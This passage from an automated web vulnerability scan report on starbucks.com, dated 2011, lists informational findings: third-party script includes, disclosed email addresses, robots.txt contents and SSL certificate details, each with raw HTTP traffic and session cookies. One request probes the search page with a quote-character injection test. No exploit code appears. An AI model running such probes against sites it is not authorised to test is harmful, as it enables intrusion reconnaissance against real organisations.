Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:05 GMT
Connection: close
Content-Length: 40795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.291. http://www.starbucks.com/responsibility/sourcing/farmer-support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/farmer-support

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/farmer-support HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:32 GMT
Connection: close
Content-Length: 39257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.292. http://www.starbucks.com/responsibility/sourcing/store-products  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/store-products

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/store-products HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:57 GMT
Connection: close
Content-Length: 38245

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.293. http://www.starbucks.com/responsibility/sourcing/tea  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/sourcing/tea

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/sourcing/tea HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:12:35 GMT
Connection: close
Content-Length: 36819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.294. http://www.starbucks.com/responsibility/wellness  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /responsibility/wellness

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /responsibility/wellness HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:14:20 GMT
Connection: close
Content-Length: 41474

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.295. http://www.starbucks.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /search

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /search?keywords=%27 HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.1.10.1297134218; _chartbeat2=vqos4oan0hnfddev

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:03:21 GMT
Content-Length: 33802

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.296. http://www.starbucks.com/site-map  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /site-map

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /site-map HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:21 GMT
Connection: close
Content-Length: 92706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.297. http://www.starbucks.com/smooth  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /smooth HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.nypost.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
Set-Cookie: ASP.NET_SessionId=b3nzwklyjnnztbu1h1ntnzeg; path=/; HttpOnly
Set-Cookie: skin=; path=/
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:25 GMT
Content-Length: 35230

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.298. http://www.starbucks.com/store-locator  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /store-locator

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /store-locator HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:06 GMT
Connection: close
Content-Length: 39794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
<![endif]-->

   
   <script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=6.2"></script>
...[SNIP]...

6.299. http://www.starbucks.com/whats-new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /whats-new

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /whats-new HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:19:49 GMT
Connection: close
Content-Length: 46242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

6.300. https://www.starbucks.com/card/set-auto-reload  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /card/set-auto-reload

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /card/set-auto-reload HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:24:39 GMT
Connection: close
Content-Length: 35911

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

<script type="text/javascript" src="https://s7.addthis.com/js/250/addthis_widget.js#username=starbucks"></script>
...[SNIP]...

7. Email addresses disclosed  previous  next
There are 5 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


7.1. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The following email address was disclosed in the response:

Request

GET /about-us/company-information/online-policies/terms-of-use HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:18:20 GMT
Connection: close
Content-Length: 68702

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="mailto:info@starbucks.com">info@starbucks.com</a>
...[SNIP]...

7.2. http://www.starbucks.com/customer-service/faqs/card  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/card

Issue detail

The following email address was disclosed in the response:

Request

GET /customer-service/faqs/card HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:45 GMT
Connection: close
Content-Length: 87706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue. </p>
...[SNIP]...

7.3. http://www.starbucks.com/customer-service/faqs/coffeehouse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/coffeehouse

Issue detail

The following email addresses were disclosed in the response:

Request

GET /customer-service/faqs/coffeehouse HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:06:23 GMT
Connection: close
Content-Length: 59009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<p>Some users are experiencing issues logging into their Starbucks Card accounts. Please email us at starbuckscardmobile@starbucks.com and include your username and the time you experienced the issue to help our tech team isolate the issue.</p>
...[SNIP]...
<a href="mailto:info@mystarbucksidea.com">
...[SNIP]...

7.4. http://www.starbucks.com/customer-service/faqs/shop  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /customer-service/faqs/shop

Issue detail

The following email address was disclosed in the response:

Request

GET /customer-service/faqs/shop HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:08:01 GMT
Connection: close
Content-Length: 51544

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="mailto:webmaster@starbucks.com">webmaster@starbucks.com</a>
...[SNIP]...

7.5. http://www.starbucks.com/static/js/global.js  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /static/js/global.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/js/global.js HTTP/1.1
Host: www.starbucks.com
Proxy-Connection: keep-alive
Referer: http://www.starbucks.com/smooth
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Mon, 24 Jan 2011 21:21:35 GMT
Accept-Ranges: bytes
ETag: "25ee39aecbccb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:28 GMT
Content-Length: 30256

/* ---- SB Namespace ---- */
var SB = SB || {};

/*
hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
<http://cherne.net/brian/resources/jquery.hoverIntent.html>
@param f onMouseOver function || A
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

8. Robots.txt file  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /smooth

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: www.starbucks.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 30 Sep 2010 19:28:44 GMT
Accept-Ranges: bytes
ETag: "5ecb44b2d560cb1:0"
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:02:27 GMT
Connection: close
Content-Length: 130

User-agent: *
Allow: /

User-agent: Adsbot-Google
Disallow: /

User-agent: Googlebot-Image
Disallow: /static/
Allow: /


9. SSL certificate  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.starbucks.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.starbucks.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Thu Aug 05 19:00:00 CDT 2010
Valid to:  Sun Aug 21 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 19:00:00 CDT 2009
Valid to:  Sun Mar 24 18:59:59 CDT 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 19:00:00 CDT 1998
Valid to:  Tue Aug 01 18:59:59 CDT 2028

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

Report generated by XSS.CX at Tue Feb 08 11:37:52 CST 2011.